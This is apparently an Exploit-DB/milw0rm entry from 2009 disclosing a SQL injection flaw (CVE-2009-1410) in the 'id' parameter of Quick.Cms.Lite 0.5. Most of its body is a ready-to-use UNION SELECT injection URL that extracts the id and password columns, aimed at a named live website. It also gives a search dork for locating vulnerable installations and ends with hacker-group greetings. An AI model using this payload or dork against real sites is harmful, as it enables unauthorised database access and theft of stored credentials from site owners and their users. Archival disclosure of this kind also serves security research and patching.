Quick.Cms.Lite 0.5 id Remote SQL Injection Vulnerability

2009-04-21T00:00:00
ID EDB-ID:8505
Type exploitdb
Reporter Player
Modified 2009-04-21T00:00:00

Description

Quick.Cms.Lite 0.5 (id) Remote SQL Injection Vulnerability. CVE-2009-1410. Webapps exploit for php platform

                                        
                                            [+]-------------------------------------[+]
[+] Homepage: http://opensolution.org/
[+] Product: Quick.CMS Lite 0.5
[+] File: index.php
[+] Parameter: id
[+] Dork: "Powered by Quick.Cms"
[+]-------------------------------------[+]
[+] SQL Injection:
[+] http://www.sennik.sos.pl/index.php?t=ph&id=null'+union+select+
[+] unhex(hex(concat_ws(0x203a20,id,litera,haslo,0x3c62723e3c62723e)))
[+] +from+sennik--+
[+]-------------------------------------[+]
[+] Discovered by -=Player=-
[+] http://NovuSec.com
[+] http://Free-Hack.com
[+]-------------------------------------[+]
[+] Greetz to :
[+] Lidloses_Auge, Suicide, enco, J0hn.X3r, Dexx, 2called-chaos, xant0x
[+]-------------------------------------[+] 

# milw0rm.com [2009-04-21]